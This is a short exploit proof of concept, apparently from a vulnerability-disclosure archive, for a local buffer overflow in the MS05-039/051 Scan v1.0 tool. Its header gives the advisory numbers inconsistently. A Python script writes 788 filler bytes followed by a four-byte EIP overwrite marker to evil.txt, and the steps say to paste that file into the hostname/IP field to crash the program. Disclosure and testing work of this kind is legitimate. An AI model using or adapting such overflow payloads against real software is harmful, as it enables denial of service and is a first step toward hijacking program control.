MS05-039 Scan version 1.0 hostname / IP field local buffer overflow proof of concept exploit.
220466729f7d646f04bfa6d4f96f833a
#!/usr/bin/python
# Exploit Title : MS05-051 Scan v1.0 Hostname/IP Field Local BoF PoC
# Discovery by : Anurag Srivastava
# Email : [email protected]
# Discovery Date : 18/08/2017
# Software Link : https://www.mcafee.com/in/downloads/free-tools/ms05-051-scan.aspx
# Tested Version : 1.0
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 10 Home x64
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
buffer = "A"*788
eip = "B"*4
f = open("evil.txt", "wb")
f.write(buffer+eip)
f.close()